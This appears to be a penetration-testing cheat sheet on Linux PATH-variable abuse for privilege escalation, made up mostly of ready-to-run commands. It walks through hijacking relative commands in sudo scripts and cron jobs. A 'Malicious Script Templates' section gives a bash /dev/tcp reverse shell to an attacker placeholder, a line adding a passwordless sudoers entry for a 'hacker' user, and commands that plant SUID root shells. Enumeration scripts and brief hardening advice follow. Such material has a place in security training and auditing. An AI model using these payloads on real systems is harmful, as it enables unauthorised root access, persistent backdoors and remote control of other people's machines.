π€οΈPATH Abuse
π― Overview
PATH environment variable manipulation to achieve privilege escalation by hijacking command execution through directory precedence and writable path exploitation.
π PATH Variable Basics
Understanding PATH
# Check current PATH
echo $PATH
env | grep PATH
# Typical PATH structure
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/gamesHow PATH Works:
System searches directories left to right
First match gets executed
Absolute paths bypass PATH lookup
Relative commands use PATH resolution
π― PATH Hijacking Attack Vectors
Current Directory Injection
# Add current directory to PATH (dangerous!)
PATH=.:$PATH
export PATH
# Create malicious script
echo 'echo "PATH HIJACKED!"' > ls
chmod +x ls
# Execute - runs our script instead of /bin/ls
lssudo =
Writable Directory Exploitation
# Find writable directories in PATH
echo $PATH | tr ':' '\n' | xargs ls -ld 2>/dev/null | grep "^d.w"
# Check for writable dirs
for dir in $(echo $PATH | tr ':' '\n'); do
if [ -w "$dir" ]; then
echo "Writable: $dir"
fi
doneπ§ Common Attack Scenarios
Scenario 1: Sudo Script with Relative Commands
# Check sudo permissions
sudo -l
# Example vulnerable sudo entry:
# (root) NOPASSWD: /home/user/script.sh
# If script.sh contains relative commands:
cat /home/user/script.sh
# #!/bin/bash
# ls /tmp # Vulnerable - uses relative 'ls'
# ps aux # Vulnerable - uses relative 'ps'Exploitation:
# Create malicious binaries
echo '#!/bin/bash' > /tmp/ls
echo '/bin/bash' >> /tmp/ls
chmod +x /tmp/ls
# Modify PATH to prioritize /tmp
export PATH=/tmp:$PATH
# Execute vulnerable sudo script
sudo /home/user/script.sh # Triggers our malicious 'ls'Scenario 2: Cronjob Path Manipulation
# Check cron jobs for relative commands
cat /etc/crontab
ls -la /etc/cron.d/
# Look for scripts using relative paths
grep -r "#!/bin/sh" /etc/cron.d/ | xargs catIf cron job runs:
*/5 * * * * root /script.shAnd script.sh contains:
#!/bin/sh
cp /important/file /backup/ # Vulnerable if PATH is manipulatedπ Script and Binary Hijacking
Common Target Commands
# Most frequently hijacked commands
ls, ps, id, whoami, cat, cp, mv, rm, chmod, chownMalicious Script Templates
# Simple privilege escalation
#!/bin/bash
/bin/bash
# Reverse shell
#!/bin/bash
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Add user to sudoers
#!/bin/bash
echo "hacker ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
# Copy /bin/bash to writable location with SUID
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbashπ Enumeration Techniques
PATH Analysis
# Current user PATH
echo $PATH
# Other users' PATH (from environment)
cat /home/*/.bashrc | grep PATH
cat /home/*/.profile | grep PATH
# System-wide PATH settings
cat /etc/environment
cat /etc/profileWritable Directory Detection
# Check PATH directories for write permissions
echo $PATH | tr ':' '\n' | while read dir; do
if [ -w "$dir" 2>/dev/null ]; then
echo "WRITABLE: $dir"
fi
done
# Alternative one-liner
echo $PATH | tr ':' '\n' | xargs -I {} sh -c 'test -w "{}" && echo "Writable: {}"'Vulnerable Script Detection
# Find scripts using relative commands
grep -r "^[^/]" /etc/cron.d/ 2>/dev/null
grep -r "^[^/]" /opt/scripts/ 2>/dev/null
# Check sudo scripts for relative paths
sudo -l | grep -E "\(/.*\.sh\)" | while read script; do
if [ -r "$script" ]; then
echo "=== $script ==="
grep -E "^[a-zA-Z]" "$script" | head -5
fi
doneπ Exploitation Examples
Basic PATH Hijacking
# 1. Identify vulnerable script
sudo -l
# Output: (root) NOPASSWD: /usr/local/bin/backup.sh
# 2. Analyze script
cat /usr/local/bin/backup.sh
# Contains: tar czf backup.tar.gz *
# 3. Create malicious tar
echo '#!/bin/bash' > /tmp/tar
echo 'chmod u+s /bin/bash' >> /tmp/tar
chmod +x /tmp/tar
# 4. Modify PATH
export PATH=/tmp:$PATH
# 5. Execute vulnerable script
sudo /usr/local/bin/backup.sh
# 6. Verify SUID bash
ls -la /bin/bash
/bin/bash -p # Gain root shellCronjob PATH Exploitation
# If cron runs script with relative commands
# Create malicious binary in writable PATH directory
echo '#!/bin/bash' > /usr/local/bin/vulnerable_cmd
echo 'cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash' >> /usr/local/bin/vulnerable_cmd
chmod +x /usr/local/bin/vulnerable_cmd
# Wait for cron execution
# Then execute SUID bash
/tmp/rootbash -pπ Detection & Enumeration
Quick PATH Audit
#!/bin/bash
echo "=== PATH ABUSE ENUMERATION ==="
echo "[+] Current PATH:"
echo $PATH
echo "[+] Writable PATH directories:"
echo $PATH | tr ':' '\n' | while read dir; do
if [ -w "$dir" 2>/dev/null ]; then
echo " WRITABLE: $dir"
fi
done
echo "[+] Sudo scripts with potential relative commands:"
sudo -l 2>/dev/null | grep -E "NOPASSWD.*\.sh" | while read line; do
script=$(echo $line | grep -oE "/.*\.sh")
if [ -r "$script" ]; then
echo " Script: $script"
grep -E "^[a-zA-Z]" "$script" 2>/dev/null | head -3 | sed 's/^/ /'
fi
done
echo "[+] Cron jobs with relative commands:"
cat /etc/crontab 2>/dev/null | grep -v "^#" | grep -E "[^/][a-zA-Z]"β οΈ Defensive Considerations
Secure PATH Practices
# Always use absolute paths in scripts
/bin/ls instead of ls
/usr/bin/id instead of id
# Secure PATH for scripts
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Remove current directory from PATH
export PATH=$(echo $PATH | sed 's/:\.:/:/g' | sed 's/^\.://' | sed 's/:\.$//')Common Vulnerabilities
Current directory (.) in PATH - Most dangerous
Writable directories in PATH - Exploitation opportunity
Scripts using relative commands - Hijacking targets
User-modifiable PATH - Attack vector
π Key Attack Points
High-Impact Scenarios
Sudo scripts with relative commands + writable PATH directory
Cron jobs executing scripts with relative paths
SUID binaries calling other programs without absolute paths
User scripts with PATH manipulation capabilities
Quick Wins
Check
sudo -lfor scriptsLook for writable directories in PATH
Find scripts with relative command calls
Test PATH modification permissions
PATH abuse exploits the fundamental way Linux systems locate executables - by manipulating the search order, attackers can hijack command execution and escalate privileges through legitimate system mechanisms.
Last updated